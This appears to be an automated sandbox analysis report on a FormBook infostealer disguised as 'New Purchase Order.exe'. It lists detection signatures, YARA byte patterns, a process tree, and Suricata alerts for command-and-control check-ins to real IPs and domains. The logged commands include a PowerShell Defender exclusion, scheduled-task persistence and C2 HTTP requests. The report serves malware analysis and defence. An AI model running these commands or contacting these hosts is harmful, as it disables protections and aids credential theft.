Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name: New Purchase Order.exe
Analysis ID: 1512971
MD5: e392c45451247441d1763095db3cd57a
SHA1: f37255d99c5bff5c1e60209d7afee3445e277e6d
SHA256: 7616904db54d77cb25cc58f279bfdf6ef5cbabe19573cbd781238be01daaa1c4
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • New Purchase Order.exe (PID: 4988 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: E392C45451247441D1763095DB3CD57A)
    • powershell.exe (PID: 1664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5368 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Purchase Order.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: E392C45451247441D1763095DB3CD57A)
      • SguBfrlSDIFxPr.exe (PID: 4136 cmdline: "C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 3416 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • SguBfrlSDIFxPr.exe (PID: 3196 cmdline: "C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1584 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • hbaiQWstL.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\hbaiQWstL.exe MD5: E392C45451247441D1763095DB3CD57A)
    • schtasks.exe (PID: 4188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hbaiQWstL.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Roaming\hbaiQWstL.exe" MD5: E392C45451247441D1763095DB3CD57A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bfe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1414f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
9.2.New Purchase Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.New Purchase Order.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.New Purchase Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.New Purchase Order.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\hbaiQWstL.exe, ParentImage: C:\Users\user\AppData\Roaming\hbaiQWstL.exe, ParentProcessId: 2308, ParentProcessName: hbaiQWstL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", ProcessId: 4188, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", ProcessId: 5368, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", ProcessId: 5368, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T09:02:38.896122+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49723 | 82.221.128.183 | 80 | TCP
2024-09-18T09:03:10.463337+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57954 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:24.018954+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57960 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:38.098354+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57964 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:51.953976+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57969 | 162.0.213.94 | 80 | TCP
2024-09-18T09:04:05.882314+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57973 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T09:03:02.686621+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57951 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:05.348998+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57952 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:07.911277+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57953 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:17.180314+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57957 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:19.727259+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57958 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:22.274064+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57959 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:30.443957+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57961 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:33.005262+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57962 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:35.518266+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57963 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:44.286470+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57965 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:46.872970+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57966 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:49.478868+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57967 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:57.763893+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57970 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:00.089121+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57971 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:03.651445+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57972 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:11.391462+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57974 | 13.248.169.48 | 80 | TCP
2024-09-18T09:04:13.917505+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57975 | 13.248.169.48 | 80 | TCP
2024-09-18T09:04:16.464696+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57976 | 13.248.169.48 | 80 | TCP

            AV Detection

Source: New Purchase Order.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe; Avira: detection malicious, Label: HEUR/AGEN.1306097
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe; Virustotal: Detection: 32%
Source: New Purchase Order.exe; Virustotal: Detection: 32%
Source: New Purchase Order.exe; ReversingLabs: Detection: 18%
Source: Yara match; File source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe; Joe Sandbox ML: detected
Source: New Purchase Order.exe; Joe Sandbox ML: detected
Source: New Purchase Order.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: New Purchase Order.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SguBfrlSDIFxPr.exe, 00000010.00000000.2305918162.000000000093E000.00000002.00000001.01000000.0000000D.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000000.2457069327.000000000093E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\setupugc.exe; Code function: 17_2_00CFC520 FindFirstFileW,FindNextFileW,FindClose, 17_2_00CFC520
Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 4x nop then jmp 074D020Bh 0_2_074D038F
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h] 10_2_058EC518
Source: C:\Windows\SysWOW64\setupugc.exe; Code function: 4x nop then xor eax, eax 17_2_00CE9C00
Source: C:\Windows\SysWOW64\setupugc.exe; Code function: 4x nop then mov ebx, 00000004h 17_2_03480469

            Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57964 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57965 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57961 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49723 -> 82.221.128.183:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57973 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57967 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57963 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57962 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57951 -> 217.160.0.127:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57969 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57953 -> 217.160.0.127:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57975 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57972 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57960 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57970 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57976 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57958 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57952 -> 217.160.0.127:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57959 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57957 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57966 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57974 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57954 -> 217.160.0.127:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57971 -> 3.33.130.190:80
            Source: DNS query: www.nevsehir-nakliyat.xyz
Source: Joe Sandbox View; IP Address: 162.0.213.94
Source: Joe Sandbox View; IP Address: 217.160.0.127
Source: Joe Sandbox View; ASN Name: ACPCA
Source: Joe Sandbox View; ASN Name: THORDC-ASIS
Source: Joe Sandbox View; ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= HTTP/1.1 | Host: www.nosr.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Source: global traffic; HTTP traffic detected: GET /4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= HTTP/1.1 | Host: www.complexity.pub | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
